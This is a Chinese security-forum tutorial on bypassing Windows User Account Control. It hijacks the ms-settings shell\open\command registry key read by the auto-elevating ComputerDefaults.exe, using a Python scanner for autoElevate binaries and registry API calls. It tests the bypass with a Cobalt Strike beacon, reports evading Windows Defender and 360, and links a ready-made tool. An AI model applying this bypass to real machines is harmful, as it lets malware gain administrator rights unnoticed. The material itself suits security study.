问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
关于bypassuac的探究
# 基础知识 **用户帐户控制**(User Account Control)是Windows Vista(及更高版本操作系统)中一组新的基础结构技术,可以帮助阻止恶意程序(有时也称为“[恶意软件])
基础知识 ==== **用户帐户控制**(User Account Control)是Windows Vista(及更高版本操作系统)中一组新的基础结构技术,可以帮助阻止恶意程序(有时也称为“[恶意软件](https://baike.baidu.com/item/%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6)”)损坏系统,同时也可以帮助组织部署更易于管理的平台。 使用UAC,应用程序和任务总是在非管理员帐户的安全上下文中运行,但管理员专门给系统授予管理员级别的访问权限时除外。UAC会阻止未经授权应用程序的自动安装,防止无意中对系统设置进行更改。 用户帐户控制(UAC)是**新版Windows**的核心安全功能,也是其最常被人误解的众多安全功能当中的一种。 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-ac31201c84ca56d24e0c2ed4ea6243a7dab038a9.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-ac31201c84ca56d24e0c2ed4ea6243a7dab038a9.png) 而在这些程序里面,有的需要授权、有的不需要,是因为UAC是分授权等级的 首先请按Win+R,输入gpedit.msc,打开组策略。 然后我们在左侧窗口找到“计算机配置–Windows设置–安全设置–本地策略–安全选项”,再在右侧窗口找到“用户帐户控制: 管理员批准模式中管理员的提升权限提示的行为”,双击该条目,打开设置窗口,如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-03548a2f69bfa961be0d0b7ed3f3d8526ea7677f.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-03548a2f69bfa961be0d0b7ed3f3d8526ea7677f.png) > 不提示直接提升:关闭UAC,需要权限时直接提升权限。 > > 在安全桌面上提示凭据:需要权限时在安全桌面上输入管理员密码提升权限。 > > 在安全桌面上同意提示:需要权限时在安全桌面上选择“允许”提升权限。 > > 提示凭据:需要权限时在普通窗口中输入管理员密码提升权限。 > > 同意提示:需要权限时在普通窗口中选择“允许”提升权限。 > > 非 Windows 二进制文件的同意提示:(默认设置)当非 Microsoft 应用程序的某个操作需要提升权限时,选择“允许”提升权限。 因为普通应用执行权限有限,某些操作必然会要求更高的管理员权限。此时,通常就需要一个权限提升的操作。程序可以向系统请求提权,系统会将此请求通过提一个提示框,请用户确认。 如果当前用户的用户组权限不是管理员,提权操作是要求输入管理员密码的,这点和在Linux中的相应操作类似。 - 程序只能在运行前要求提权。如果已经在运行了,那么将失去申请提权的能力 - 权限提升仅对此次进程有效 提升权限的操作大致有两个: - 自动提权请求 - 手动提权请求 手动提权就是“以管理员身份运行”,自动提权请求就是程序本身就一运行就开始申请权限,如:注册表编辑器 在开发的过程中,程序员若要开发一个程序,可以在编译器配置,写入一个配置文件,用于向系统标识该应用程序是必须要管理员权限运行的。 **visual studio里面的uac** 在visual studio里面有一个manifest文件,这个文件本质上是一个xml文件,用于标识当前应用程序的配置属性。其中这几个级别明细如下 > - aslnvoker 默认权限 > - highestAvailable 最高权限 > - requireAdministrator 必须是管理员权限 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-8c926b7a823d609d1853d37bb7da7919d3762cd3.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-8c926b7a823d609d1853d37bb7da7919d3762cd3.png) 将编译选项调整为requireAdministrator,则当用户运行程序后,将获得管理员权限会话,不需要绕过UAC。 挖掘白名单的uac程序 =========== 有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。 这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。 那么我们要寻找的uac程序需要符合以下几个要求: ```c++ 1. 程序的manifest标识的配置属性 autoElevate 为true 2. 程序不弹出UAC弹窗 3. 从注册表里查询Shell\Open\command键值对 ``` 首先是寻找autoElevate为true的程序,这里就写一个py脚本去批量跑一下,这里就找system32目录下面的 ```python import os from subprocess import * path = 'c:\windows\system32' files = os.listdir(path) print(files) def GetFileList(path, fileList): newDir = path if os.path.isfile(path): if path[-4:] == '.exe': fileList.append(path) elif os.path.isdir(path): try: for s in os.listdir(path): newDir=os.path.join(path,s) GetFileList(newDir, fileList) except Exception as e: pass return fileList files = GetFileList(path, []) print(files) for eachFile in files: if eachFile[-4:] == '.exe': command = r'.\sigcheck64.exe -m {} | findstr auto'.format(eachFile) print(command) p1 = Popen(command, shell=True, stdin=PIPE, stdout=PIPE) if '<autoElevate>true</autoElevate>' in p1.stdout.read().decode('gb2312'): copy_command = r'copy {} .\success'.format(eachFile) Popen(copy_command, shell=True, stdin=PIPE, stdout=PIPE) print('[+] {}'.format(eachFile)) with open('success.txt', 'at') as f: f.writelines('{}\n'.format(eachFile)) ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-0b62511bfa1e96cf801e08cb4bd6cf5f789353d8.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-0b62511bfa1e96cf801e08cb4bd6cf5f789353d8.png) 整理之后exe如下所示 ```php c:\windows\system32\bthudtask.exe c:\windows\system32\changepk.exe c:\windows\system32\ComputerDefaults.exe c:\windows\system32\dccw.exe c:\windows\system32\dcomcnfg.exe c:\windows\system32\DeviceEject.exe c:\windows\system32\DeviceProperties.exe c:\windows\system32\djoin.exe c:\windows\system32\easinvoker.exe c:\windows\system32\EASPolicyManagerBrokerHost.exe c:\windows\system32\eudcedit.exe c:\windows\system32\eventvwr.exe c:\windows\system32\fodhelper.exe c:\windows\system32\fsquirt.exe c:\windows\system32\FXSUNATD.exe c:\windows\system32\immersivetpmvscmgrsvr.exe c:\windows\system32\iscsicli.exe c:\windows\system32\iscsicpl.exe c:\windows\system32\lpksetup.exe c:\windows\system32\MSchedExe.exe c:\windows\system32\msconfig.exe c:\windows\system32\msra.exe c:\windows\system32\MultiDigiMon.exe c:\windows\system32\newdev.exe c:\windows\system32\odbcad32.exe c:\windows\system32\PasswordOnWakeSettingFlyout.exe c:\windows\system32\pwcreator.exe c:\windows\system32\rdpshell.exe c:\windows\system32\recdisc.exe c:\windows\system32\rrinstaller.exe c:\windows\system32\shrpubw.exe c:\windows\system32\slui.exe c:\windows\system32\Sysprep\sysprep.exe c:\windows\system32\SystemPropertiesAdvanced.exe c:\windows\system32\SystemPropertiesComputerName.exe c:\windows\system32\SystemPropertiesDataExecutionPrevention.exe c:\windows\system32\SystemPropertiesHardware.exe c:\windows\system32\SystemPropertiesPerformance.exe c:\windows\system32\SystemPropertiesProtection.exe c:\windows\system32\SystemPropertiesRemote.exe c:\windows\system32\SystemSettingsAdminFlows.exe c:\windows\system32\SystemSettingsRemoveDevice.exe c:\windows\system32\Taskmgr.exe c:\windows\system32\tcmsetup.exe c:\windows\system32\TpmInit.exe c:\windows\system32\WindowsUpdateElevatedInstaller.exe c:\windows\system32\WSReset.exe c:\windows\system32\wusa.exe ``` 然后再去寻找不弹uac框的程序,这里我就从上往下开始尝试,找到的是`ComputerDefaults.exe`这个exe [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-6e9c84ba28de5504b235c35fa7d10ce8e989807a.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-6e9c84ba28de5504b235c35fa7d10ce8e989807a.png) 运行之后直接就会出现默认应用这个界面 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-58d53f183e63014f3ecf5b6fff8e71e7dd8cfed4.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-58d53f183e63014f3ecf5b6fff8e71e7dd8cfed4.png) uac程序特性探究 ========= 通常以shell\\open\\command命名的键值对存储的是可执行文件的路径,如果exe程序运行的时候找到该键值对,就会运行该键值对的程序,而因为exe运行的时候是静默提升了权限,所以运行的该键值对的程序就已经过了uac。所以我们把恶意的exe路径写入该键值对,那么就能够过uac执行我们的恶意exe。 这里使用proc监听`ComputerDefaults.exe` [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-b0ac64145955e48514cda97d658790ec02282087.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-b0ac64145955e48514cda97d658790ec02282087.png) 发现他会去查询`HKCU\Software\Classes\ms-settings\Shell\Open\command`里面的值 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-097a1c68acff80741bb556eb4fcc21ce793a33b0.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-097a1c68acff80741bb556eb4fcc21ce793a33b0.png) 那么我们创建一个`HKCU\Software\Classes\ms-settings\Shell\Open\command`路径,再对`ComputerDefaults.exe`进行监听尝试 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-14452092231f5d1e094fd74303d661123e19b5ea.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-14452092231f5d1e094fd74303d661123e19b5ea.png) 然后发现他还会去查询`HKCU\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute`,而且Result显示的是NAME NOT FOUND,那么可以认为首先去查询`HKCU\Software\Classes\ms-settings\Shell\Open\command`路径下的注册表,再去查询`HKCU\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute`是否存在 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-9e9cc3b3ace215c2edb0558f4b00a77bc83361cf.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-9e9cc3b3ace215c2edb0558f4b00a77bc83361cf.png) 那么这里我创建一个DelegateExecute的键值对,然后把默认键值对指向我的一个程序进行尝试 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-77c255b595d22b324de7b2e80678e7b350fe4b20.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-77c255b595d22b324de7b2e80678e7b350fe4b20.png) 当我运行`c:\windows\system32\ComputerDefaults.exe`的时候,发现不再弹出的是默认进程的界面,而是打开了我自己的程序 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-aded31b8174ea622905f097d76160176d2b4589d.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-aded31b8174ea622905f097d76160176d2b4589d.png) 那么这里就可以大胆的猜测一下,首先运行`ComputerDefaults.exe`这个程序之前,会查询`HKCU:\Software\Classes\ms-settings\shell\open\command`这个目录是否存在,若存在继续寻找同目录下是否有`DelegateExecute`这个键值对,若两者都存在则执行`HKCU:\Software\Classes\ms-settings\shell\open\command`指向的exe路径 为了验证猜想,这里我将exe路径改为cmd,若猜测成立则可以获得管理员权限的cmd [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-8f9e32864d2fe1397bdb9e6e0e756932f767b076.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-8f9e32864d2fe1397bdb9e6e0e756932f767b076.png) `whoami /priv`查看一下果然成功 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-1ff4f1b1d6fa15647af69a5aa85761b2e57dcb2a.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-1ff4f1b1d6fa15647af69a5aa85761b2e57dcb2a.png) bypass的实现 ========= 经过上面的探究过后,我们整理下思路,首先要创建注册表,并添加`DelegateExecute`这个键值对,并修改`command`的指向exe路径即可bypassuac,那么这里用到一下几个函数 **RegCreateKeyExA** 首先是创建注册表项,对应的是之前创建`HKCU\Software\Classes\ms-settings\Shell\Open\command`这个路径的操作,这个路径默认情况下是不存在的 ```c++ LSTATUS RegCreateKeyExA( [in] HKEY hKey, [in] LPCSTR lpSubKey, DWORD Reserved, [in, optional] LPSTR lpClass, [in] DWORD dwOptions, [in] REGSAM samDesired, [in, optional] const LPSECURITY_ATTRIBUTES lpSecurityAttributes, [out] PHKEY phkResult, [out, optional] LPDWORD lpdwDisposition ); ``` > hkey:句柄 > > lpSubKey:此函数打开或创建的子项的名称 > > Reserved:保留参数,必须为0 > > lpClass:该键的用户定义类类型。可以忽略此参数。此参数可以为**NULL** > > dwOptions:有几个值,使用的时候具体查询 > > samDesired:指定要创建的密钥的访问权限的掩码 > > lpSecurityAttributes:指向[SECURITY\_ATTRIBUTES](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa379560(v=vs.85))结构的指针 > > phkResult:指向接收打开或创建的键的句柄的变量的指针 > > lpdwDisposition:指向处置值变量的指针 **RegSetValueExA** 再就是修改注册表项,指向我们的恶意exe路径 ```c++ LSTATUS RegSetValueExA( [in] HKEY hKey, [in, optional] LPCSTR lpValueName, DWORD Reserved, [in] DWORD dwType, [in] const BYTE *lpData, [in] DWORD cbData ); ``` > hkey:句柄 > > lpValueName:要设置的值的名称 > > Reserved:保留参数,必须为0 > > dwType:*lpData*参数指向的数据类型 > > lpData:要存储的数据 > > cbData:*lpData*参数指向的信息的大小,以字节为单位 **RegDeleteTreeA** 执行exe过后我们为了隐蔽最好是删除这个路径,那么就需要用到这个api ```c++ LSTATUS RegDeleteTreeA( [in] HKEY hKey, [in, optional] LPCSTR lpSubKey ); ``` > hkey:句柄 > > lpSubKey:密钥的名称 这里测试一下,先把路径写成cmd.exe ```c++ char filePath[] = "C:\\Windows\\System32\\cmd.exe"; ``` 实现效果如下 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-86e8c9305dfff37efbf9ae5333efd9495cd88838.jpg)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-86e8c9305dfff37efbf9ae5333efd9495cd88838.jpg) 这里cmd的实现成功了,那么直接使用cs的马上线能不能够直接bypassuac呢,实验一下,这里把路径改为cs马的路径 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-bc659b9835594b49c2e9cb58935ad571fd917c13.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-bc659b9835594b49c2e9cb58935ad571fd917c13.png) 实现效果如下 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-3e4bded5da905d78132f3304fab54d129715f9f1.jpg)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-3e4bded5da905d78132f3304fab54d129715f9f1.jpg) [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-a898718b84303f3281eff92ca1cf9e2f813ee38e.jpg)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-a898718b84303f3281eff92ca1cf9e2f813ee38e.jpg) 这里为了验证已经bypass了uac,我后面手动自己点了一下cs的木马,第一个就是我们通过我们写的程序上线的,第二个就是直接点击上线的,看一下区别 仔细看的话这里bypass过的右上角有一个\* [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-f173f69176dc505f11a966b7b36ee38f83f68f0b.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-f173f69176dc505f11a966b7b36ee38f83f68f0b.png) 首先看一下第一个对话 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-eb202b452e6000902247a355f3c9dd7ff31cee87.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-eb202b452e6000902247a355f3c9dd7ff31cee87.png) 再看下第二个对话,很明显这里已经bypass过了uac [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-cadf800de7225f635a40071d17d1500f0a118399.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-cadf800de7225f635a40071d17d1500f0a118399.png) 思考 == 我们所使用的几个api,如`RegCreateKeyExA`、`RegSetKeyExA`都是直接修改注册表的操作,这种操作应该被归类为敏感操作,那么这里会不会被杀软拦截呢,去测试一下 windows defender正常上线 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-bad90141a3a6ddf843bb25fb856f84f54b7cc08b.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-bad90141a3a6ddf843bb25fb856f84f54b7cc08b.png) 获取到的权限也是bypassuac后的权限 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-66f8ced251d008dc6c8e2161de340cd90fca5752.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-66f8ced251d008dc6c8e2161de340cd90fca5752.png) 再看一下360,这里我试了两个方法,第一种方法是直接对`artifact.exe`做一下免杀,然后执行`bypassuac.exe`可以正常上线并bypassuac,但是如果使用注入shellcode到其他的exe就不能够获得uac权限 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-017f3809ff06910984a94c7d2328175f1dab9901.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-017f3809ff06910984a94c7d2328175f1dab9901.png) 如图所示,这里我思考了一下,因为如果注入shellcode到其他程序,注册表指向的还是这个注入shellcode到其他程序的exe,所以后面那种方法是不能够bypassuac的 [![](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-1a893d74f0a17470a397a429621a994a2e318441.png)](https://shs3.b.qianxin.com/attack_forum/2021/10/attach-1a893d74f0a17470a397a429621a994a2e318441.png) 工具已经打包至github,有需要的师傅自取: <https://github.com/Drunkmars/BypassUAC>
发表于 2021-10-25 14:01:08
阅读 ( 5047 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
szbuffer
30 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!